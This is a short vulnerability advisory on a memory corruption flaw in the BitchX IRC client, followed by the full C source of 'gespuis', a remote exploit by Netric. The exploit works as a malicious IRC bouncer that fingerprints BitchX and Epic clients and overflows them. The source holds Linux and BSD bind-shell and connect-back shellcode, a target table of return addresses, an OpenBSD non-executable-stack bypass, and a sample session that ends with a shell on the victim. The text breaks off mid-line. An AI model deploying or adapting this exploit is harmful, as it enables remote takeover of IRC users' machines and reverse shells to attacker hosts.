// source: https://www.securityfocus.com/bid/7097/info A memory corruption vulnerability has been discovered in BitchX 1.0c19. This issue occurs when handling server-supplied data and may cause characters to be written to sensitive stack memory. As a result, it may be possible for a malicious IRC server to execute arbitrary commands on a vulnerable client. This vulnerability has been reported to affect BitchX 1.0c19. Other versions may also be affected. /* _ ________ _____ ______ 06-03-2003 __ ___ ____ /____.------` /_______.------.___.----` ___/____ ____ ___ _/ \ _ /\ __. __// ___/_ ___. /_\ /_ | _/ ___ ._\ . \\ /__ _____/ _ / \_ | /__ | _| slc | _____ _ - -------\______||--._____\---._______//-|__ //-.___|----._____|| / \ / remote BitchX/Epic Exploit (serverside) \/ by eSDee of Netric ------------------------------------------------------------------------------ - (www.netric.be|org) "gespuis.c" is an irc bouncer, that can exploit BitchX/Epic clients. Copyright (c) 2003 Netric Security All rights reserved. [esdee@flopppp]$ ./gespuis -v irc.netric.org [remote BitchX/Epic exploit (serverside) by eSDee of Netric (www.netric.be|org)] ------------------------------------------------------------------------------ - Verbose mode. Waiting for connections... [10.0.0.2] Connected... [esdee] [10.0.0.2] Sending CTCP VERSION... [10.0.0.2] Client version: BitchX-1.0c17+ by panasync - OpenBSD 3.2 [10.0.0.2] Target found. [ret: 0xcfbf7c1c] [10.0.0.2] Bindshell is running on port 0xb0ef(45295). [esdee@flopppp]$ telnet 10.0.0.2 45295 Trying 10.0.0.2... Connected to 10.0.0.2. Escape character is '^]'. uname -a; id; OpenBSD pant0ffel 3.2 pant0ffel#1 i386 uid=1000(esdee) gid=1000(esdee) groups=1000(esdee), 0(wheel) */ #include #include #include #include #include #include #include #include #include #include #include #include #include char jmp_code[] = /* jumps 0xff bytes ahead.. */ "\xeb\x09\x58\x31\xdb\xb3\xff\x01\xd8\xff\xe0\xe8\xf2\xff\xff\xff"; char BSD_bindcode[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* forking bindcode (port 0xb0ef)*/ "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57" "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89" "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50" "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80" "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56" "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd" "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; char BSD_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; char linux_bindcode[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* forking bindcode (port 0xb0ef)*/ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05" "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd" "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80" "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0" "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; char linux_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; struct { char *version; unsigned long ret; unsigned long mprotect; char *shellcode; int type; } targets[] = { /* FreeBSD targets tested on: - FreeBSD 4.7-RELEASE-p3 - FreeBSD 4.6.2-RELEASE - FreeBSD 4.6 - FreeBSD 4.5-RELEASE OpenBSD targets: - OpenBSD 3.2 - OpenBSD 3.1 - OpenBSD 3.0 - OpenBSD 2.x Linux targets: - Redhat 8.0 - Redhat 7.x - Debian 3.0 - Mandrake 8.x - Mandrake 9.0 - Slackware 8.x - Trustix 1.x Types: 0 - BitchX (Linux) 1 - BitchX (BSD) 2 - BitchX (BSD - Return into libc - mprotect() (To break the k-rad theo protection :) 3 - Epic (Linux) 4 - Epic (BSD) 5 - Epic (BSD - Return into libc - mprotect()) */ /* Auto targets */ { "BitchX-1.0c19+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c18+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c17+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c16+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c19+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c19+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c19+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ec230, BSD_bindcode, 2}, { "BitchX-1.0c18+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ce230, BSD_bindcode, 2}, { "BitchX-1.0c17+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230, BSD_bindcode, 2}, { "BitchX-1.0c16+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230, BSD_bindcode, 2}, { "BitchX-1.0c19+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c19+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "ircII EPIC4-1.1.10 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.7 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.6 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.10 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.7 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.6 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.10 OpenBSD 3.2", 0xcfbf6d74, 0x4026b230, BSD_bindcode, 5}, { "ircII EPIC4-1.1.7 OpenBSD 3.2", 0xcfbfbe64, 0x40265230, BSD_bindcode, 5}, { "ircII EPIC4-1.1.6 OpenBSD 3.2", 0xcfbfbe64, 0x40264230, BSD_bindcode, 5}, { "ircII EPIC4-1.1.10 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.7 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.6 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode, 4}, /* manual targets (thanks lucipher and thorax!) */ { "BitchX-1.0cX - Redhat 8.0", 0xbfff9bd8, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Redhat 7.x", 0xbfff9bd8, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Debian 3.x", 0xbfff9f0c, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Mandrake 9.0", 0xbfff9af0, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Mandrake 8.x", 0xbfff9af0, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Slackware 8.x", 0xbfff9bd8, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Trustix 1.x", 0x7fff9ddc, 0x00000000, linux_bindcode, 1}, { "ircII EPIC4-1.1.x Redhat 8.0", 0xbfffdf64, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Redhat 7.x", 0xbfffdf64, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Debian 3.x", 0xbfff9004, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Mandrake 9.0", 0xbfffdf10, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Mandrake 8.x", 0xbfffdf10, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Slackware 8.x", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Trustix 1.x", 0x7fff8f74, 0x00000000, linux_bindcode, 3}, { "Crash - All platforms", 0xBADe5Dee, 0x00000000, linux_bindcode, 0}, }; FILE *log = NULL; void usage(char *prog) { fprintf(stderr, "Usage : %s [-c ip address] [-l file] [-p port] [-t target] [-v] \n" "Example: %s -l /var/log/owned -p 6667 -v irc.netric.org:6668\n\n" "-c ip address connect back shellcode (port 45295)\n" "-l logfile log output to file\n" "-p port the bouncer port\n" "-t target force target, don't CTCP version. (Use -t0 for a list)\n" "-v verbose mode\n\n", prog, prog); exit(1); } int send_text(int sock, char *format, ... ) { char buffer[4096]; va_list arglist; va_start (arglist, format); vsnprintf(buffer, sizeof(buffer) - 1, format, arglist ); va_end(arglist); return send(sock, buffer, strlen(buffer), 0); } int main(int argc, char *argv[]) { char read_buf [4096]; char log_buffer [1200]; char ret_buffer [128]; char buffer [600]; char sh_buffer [2000]; char sh_host [36]; char version [256]; char nick [256]; char user [256]; char ircd_host [256]; char *ptr; unsigned int port = 6667; unsigned int ircd_port = 6667; unsigned int type = 0; unsigned int bytes = 0; struct sockaddr_in saddr_in1; struct sockaddr_in saddr_in2; struct sockaddr_in saddr_in3; struct hostent *hp; int sock_server = 0; int sock_server_new = 0; int sock_ircd = 0; int sin_size = sizeof(struct sockaddr_in); int i = 0; int k = 0; int size = 0; int opt = 0; int verbose = 0; int connectback = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; fd_set fd_read; fprintf(stdout, "[remote BitchX/Epic exploit (serverside) by eSDee of Netric (www.netric.be|org)]\n" "----------------------------------------------------------------------------- --\n"); while((opt = getopt(argc,argv,"c:l:p:t:v")) !=EOF) { switch(opt) { case 'c': sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); linux_connect_back[171] = ip1; BSD_connect_back[162] = ip1; linux_connect_back[172] = ip2; BSD_connect_back[163] = ip2; linux_connect_back[173] = ip3; BSD_connect_back[164] = ip3; linux_connect_back[174] = ip4; BSD_connect_back[165] = ip4; for(i = 0; i < sizeof(targets) / 20; i++) { switch(targets[i].type) { case 0: targets[i].shellcode = linux_connect_back; break; case 3: targets[i].shellcode = linux_connect_back; break; default: targets[i].shellcode = BSD_connect_back; break; } } fprintf(stdout, "Connecting to: %d.%d.%d.%d:45295\n", ip1, ip2, ip3, ip4); connectback = 1; break; case 'l': if ((log = fopen(optarg,"aw")) == NULL) { fprintf(stderr, "Unable to open %s.\n", optarg); return -1; } break; case 'p': port=atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr,"Invalid port.\n"); return -1; } break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 20) { for(i = 0; i < sizeof(targets) / 20; i++) fprintf(stderr, "%02d. [0x%08x] - %s\n", i + 1, (unsigned)targets[i].ret, targets[i].version); fprintf(stderr, "\n"); return -1; } fprintf(stdout, "Selected: %s [0x%08x]\n", targets[type - 1].version, (unsigned)targets[type - 1].ret); break; case 'v': fprintf(stdout, "Verbose mode.\n"); verbose = 1; break; default: usage(argv[0] == NULL ? "gespuis" : argv[0]); break; } } if (argv[optind] == NULL) usage(argv[0] == NULL ? "gespuis" : argv[0]); sscanf(argv[optind], "%255[^:]:%u", ircd_host, &ircd_port); if ((ircd_port <= 0) || (ircd_port > 65535)) { fprintf(stderr,"Invalid ircd port.\n"); return -1; } if ((hp = gethostbyname(ircd_host)) == NULL) { fprintf(stderr, "Unable to resolve %s...\n", ircd_host); return -1; } memset((char *)&saddr_in3, 0x0, sizeof(saddr_in3)); memcpy((char *)&saddr_in3.sin_addr, hp->h_addr, hp->h_length); saddr_in3.sin_family = AF_INET; saddr_in3.sin_port = htons(ircd_port); if ((sock_server = socket(AF_INET, SOCK_STREAM, 0)) == -1) { fprintf(stderr, "socket error.\n"); return -1; } setsockopt(sock_server, SOL_SOCKET, SO_REUSEADDR, &sin_size, sizeof(sin_size)); saddr_in1.sin_family = AF_INET; saddr_in1.sin_port = htons(port); saddr_in1.sin_addr.s_addr = INADDR_ANY; memset(&saddr_in1.sin_zero, 0x0, 8); if (bind(sock_server, (struct sockaddr *)&saddr_in1, sizeof(struct sockaddr)) == -1) { fprintf(stderr, "bind error.\n"); return -1; } if (listen(sock_server, 10) == -1) { fprintf(stderr, "listen.\n"); return -1; } signal(SIGCHLD, SIG_IGN); fprintf(stdout, "Waiting for connections...\n"); while(1) { if ((sock_server_new = accept(sock_server, (struct sockaddr *)&saddr_in2, &sin_size)) == -1) { perror("accept"); continue; } if (!fork()) { close(sock_server); memset(version, 0x0, sizeof(version)); memset(read_buf, 0x0, sizeof(read_buf)); while(1) { if (recv(sock_server_new, read_buf, sizeof(read_buf) - 1, 0) < 0) { close(sock_server_new); exit(1); } ptr = strstr(read_buf, "NICK "); if (ptr != NULL) { memset(nick, 0x00, sizeof(nick)); strncpy(nick, ptr + 5, sizeof(nick) - 1); for (i = 0; i < strlen(nick); i++) if(!isprint(nick[i])) nick[i] = 0x00; if (verbose == 1) fprintf(stdout, "[%s] Connected... [%s]\n", inet_ntoa(saddr_in2.sin_addr), nick); } ptr = strstr(read_buf, "USER "); if (ptr != NULL) { memset(user, 0x00, sizeof(user)); strncpy(user, ptr + 5, sizeof(user) - 1); for (i = 0; i < strlen(user); i++) if (!isprint(user[i])) user[i] = 0x00; } if (strlen(nick) != 0 && strlen(user) != 0) break; memset(read_buf, 0x0, sizeof(read_buf)); } if (type == 0) { if (verbose == 1) fprintf(stdout, "[%s] Sending CTCP VERSION...\n", inet_ntoa(saddr_in2.sin_addr)); if (send_text(sock_server_new, ":stats!netric@netric.org PRIVMSG a: %cVERSION%c\n", 0x01, 0x01) < 0) { if (verbose == 1) fprintf(stderr, "[%s] send failed!\n", inet_ntoa(saddr_in2.sin_addr)); close(sock_server_new); exit(1); } while(1) { if (recv(sock_server_new, read_buf, sizeof(read_buf) - 1, 0) < 0) { close(sock_server_new); exit(1); } ptr = strstr(read_buf, "VERSION "); if (ptr != NULL) { for (i = 0; i < sizeof(version) - 1; i++) { if (isprint(*(ptr + i + 8))) { version[k] = *(ptr + i + 8); k++; } if (*(ptr + i + 8) == ':' && *(ptr + i + 7) == ' ') { version[k - 2] = 0x00; break; } if (*(ptr + i + 8) == '-' && *(ptr + i + 9) == ' ' && *(ptr + i + 10) == 'A' && *(ptr + i + 11) == 'c') { version[k - 2] = 0x00; break; } } if (verbose == 1) fprintf(stdout, "[%s] Client version: %s\n", inet_ntoa(saddr_in2.sin_addr), version); break; } memset(read_buf, 0x0, sizeof(read_buf)) ; } if (strlen(version) == 0) { if (verbose == 1) fprintf(stderr, "[%s] No version given.\n", inet_ntoa(saddr_in2.sin_addr)); close(sock_server_new); exit(1); } for(i = 0; i < (sizeof(targets) / 20) - 1; i++) { if (memcmp(version, targets[i].version, strlen(targets[i].version)) == 0) { type = i + 1; if (verbose == 1) fprintf(stderr, "[%s] Target found. [ret: 0x%08x]\n", inet_ntoa(saddr_in2.sin_addr), (unsigned) targets[type - 1].ret); break; } } if (type == 0) { if (verbose == 1) fprintf(stderr, "[%s] Not found, bouncing to [%s:%u] ...\n", inet_ntoa(saddr_in2.sin_addr),ircd_host, ircd_port); if ((sock_ircd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { if (verbose == 1) fprintf(stderr, "[%s] socket error.\n", inet_ntoa(saddr_in2.sin_addr)); close(sock_server_new); exit(1); } if (connect(sock_ircd, (struct sockaddr *)&saddr_in3, sizeof(saddr_in3)) == -1) { if (verbose == 1) fprintf(stderr, "[%s] Unable to connect to [%s:%u].\n", inet_ntoa(saddr_in2.sin_addr), ircd_host, ircd_port); close(sock_server_new); close(sock_ircd); exit(1); } memset(log_buffer, 0x00, sizeof(log_buffer)); snprintf(log_buffer, sizeof(log_buffer) - 1, "NICK %s\nUSER %s\n", nick, user); if (send(sock_ircd, log_buffer, strlen(log_buffer), 0) < 0) { close(sock_server_new); close(sock_ircd); exit(1); } memset(read_buf, 0x00, sizeof(read_buf)); bytes = 1; while (bytes) { FD_ZERO(&fd_read); FD_SET(sock_server_new, &fd_read); FD_SET(sock_ircd, &fd_read); select(FD_SETSIZE, &fd_read, NULL, NULL, NULL); if (FD_ISSET(sock_ircd, &fd_read)) { memset(read_buf, 0x00, sizeof(read_buf)); bytes = recv(sock_ircd, read_buf, sizeof(read_buf), 4); if (bytes) send(sock_server_new, read_buf, bytes, 4); } else if (FD_ISSET(sock_server_new, &fd_read)) { memset(&read_buf, 0x00, sizeof(read_buf)); bytes = recv(sock_server_new, read_buf, sizeof(read_buf), 4); if (bytes) send(sock_ircd, read_buf, bytes, 4); } } close(sock_ircd); close(sock_server_new); exit(1); } } k = 69; i = 0; memset(sh_host, 0x00, sizeof(sh_host)); if (targets[type - 1].type < 3) { snprintf(sh_host, sizeof(sh_host) - 1, "BitchX %s:%d", ircd_host, ircd_port); } else { snprintf(sh_host, sizeof(sh_host) - 1, "epic %s:%d", ircd_host, ircd_port); } strncat(sh_host, " ", sizeof(sh_host) - strlen(sh_host) - 1); while (1) { if (sh_host[i + 0] == 0x00) break; linux_bindcode[k - 3] = sh_host[i + 0]; linux_connect_back[k - 3] = sh_host[i + 0]; if (sh_host[i + 1] == 0x00) break; linux_bindcode[k - 2] = sh_host[i + 1]; linux_connect_back[k - 2] = sh_host[i + 1]; if (sh_host[i + 2] == 0x00) break; linux_bindcode[k - 1] = sh_host[i + 2]; linux_connect_back[k - 1] = sh_host[i + 2]; if (sh_host[i + 3] == 0x00) break; linux_bindcode[k - 0] = sh_host[i + 3]; linux_connect_back[k - 0] = sh_host[i + 3]; k -= 5; i += 4; } k = 64; i = 0; while (1) { if (sh_host[i + 0] == 0x00) break; BSD_bindcode[k - 3] = sh_host[i + 0]; BSD_connect_back[k - 3] = sh_host[i + 0]; if (sh_host[i + 1] == 0x00) break; BSD_bindcode[k - 2] = sh_host[i + 1]; BSD_connect_back[k - 2] = sh_host[i + 1]; if (sh_host[i + 2] == 0x00) break; BSD_bindcode[k - 1] = sh_host[i + 2]; BSD_connect_back[k - 1] = sh_host[i + 2]; if (sh_host[i + 3] == 0x00) break; BSD_bindcode[k - 0] = sh_host[i + 3]; BSD_connect_back[k - 0] = sh_host[i + 3]; k -= 5; i += 4; } k = 0; usleep(3000000); /* We have to wait a couple of seconds, otherwise BitchX/Epic will ignore the clientinfo CTCP. */ memset(sh_buffer, 0x90, sizeof(sh_buffer)); memcpy(sh_buffer + sizeof(sh_buffer) - 1 - strlen(targets[type - 1].shellcode), targets[type - 1].shellcode, strlen(targets[type - 1].shellcode)); sh_buffer[sizeof(sh_buffer) - 1] = 0x0; if (send_text(sock_server_new, ":netric!netric@netric.org PRIVMSG a: %s\r\n", sh_buffer) < 0) { if (verbose == 1) fprintf(stderr, "[%s] send failed!\n", inet_ntoa(saddr_in2.sin_addr)); exit(1); } usleep(300000); if (targets[type - 1].type == 2 || targets[type - 1].type == 5) { /* OpenBSD 3.2! Quote: "As theo announced on misc@, non-executable stack support is available in the most recent snapshots for most platforms. In other words, say goodbye to the vast majority of buffer overflow attacks against OpenBSD machines :-) " The stack is non executable at default, so we use a return into libc technic, to get the stack executable again. We use the mprotect() function in libc, to mark the stack PROT_WRITE|PROT_READ|PROT_EXEC ;) */ size = -1; memset(ret_buffer, 0x90, sizeof(ret_buffer)); memcpy(ret_buffer + 28, &targets[type - 1].mprotect, 4); memcpy(ret_buffer + 32, &targets[type - 1].ret, 4); memcpy(ret_buffer + 36, &targets[type - 1].ret, 4); // void *addr memcpy(ret_buffer + 40, &size, 4); // size_t len ret_buffer[44] = 0x07; // int prot ret_buffer[200] = 0x00; } else { memset(ret_buffer, 0x0, sizeof(ret_buffer)); for(i = 0; i < sizeof(ret_buffer) - 4; i += 4) { ret_buffer[i + 0] = (targets[type - 1].ret >> 0) & 0xff; ret_buffer[i + 1] = (targets[type - 1].ret >> 8) & 0xff; ret_buffer[i + 2] = (targets[type - 1].ret >> 16) & 0xff; ret_buffer[i + 3] = (targets[type - 1].ret >> 24) & 0xff; } } memset(buffer, 0x90, sizeof(buffer)); memcpy(buffer - sizeof(jmp_code) - 2, jmp_code, sizeof(jmp_code) - 1); buffer[sizeof(buffer) - 1] = 0x00; if (send_text(sock_server_new, ":%s!netric@netric.org PRIVMSG a: %cCLIENTINFO %s%c\r\n", buffer, 0x01, ret_buffer, 0x01) < 0) { if (verbose == 1) { fprintf(stderr, "[%s] send failed!\n", inet_ntoa(saddr_in2.sin_addr)); exit(1); } } if (connectback == 0) { if (log) fprintf(log, "[%s] %s - Bindshell is running on port 0xb0ef(45295).\n", inet_ntoa(saddr_in2.sin_addr), nick); fprintf(stderr, "[%s] Bindshell is running on port 0xb0ef(45295).\n", inet_ntoa(saddr_in2.sin_addr)); } else { if (log) fprintf(log, "[%s] %s - Connecting to 